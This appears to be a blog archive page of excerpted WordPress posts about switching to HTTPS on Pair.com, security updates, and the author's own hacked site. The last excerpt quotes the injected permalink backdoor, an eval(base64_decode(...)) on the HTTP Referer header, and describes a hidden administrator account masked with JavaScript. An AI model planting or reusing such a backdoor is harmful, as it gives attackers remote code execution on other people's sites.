Converting this WordPress site from http: to https: – Part 2

One of the things that kept me from the change to SSL was that my hosting company, Pair.com, did not have any nice (convenient) way to use the free Let’s Encrypt SLL certificates.

Pair now offers an easy one click interface to set up SSL and they automatically renew the certificates, so there’s really no excuse to not do it.

Sign up for Pair.com now and enjoy 20% off your first pair Networks bill! Use code:
pairref-XGp4U9mb

What does the interface look like? You go to the Manage Your SSL page and look for the button next to your domain name that says:

Click the Let’s Encrypt button and you’re good to go!

After a few minutes (so that you think the computer was doing some really difficult task) it’ll present you with your domain name with a super-intelligent shade of green lock next to it. All done with the easy part!

Now for the less easy part…

Read moreConverting this WordPress site from http: to https: – Part 2

You can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

Holy mother of toad! Again! WordPress just loves to release those late in the week security updates. We already know how hackers work — they do a file compare of the old WordPress version to the new one, the write some code to exploit the vulnerability, and then they set the code loose on whatever … Read moreYou can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

WordPress – Be Ready To Be Hacked Again

Ahh… the dreaded

3.0.4 Important Security Update

…a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

Yeah. What that says to me is, “A hacker has already looked at the vulnerabilities in 3.0.3 and written a script to exploit it and deployed it on the websites he/she has already hacked so that it can go out and get access to even more web servers by simply crawling the web looking for WordPress installations that haven’t been updated yet.”

Read moreWordPress – Be Ready To Be Hacked Again

WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.

Read moreWordPress Security Exploits – This site was hacked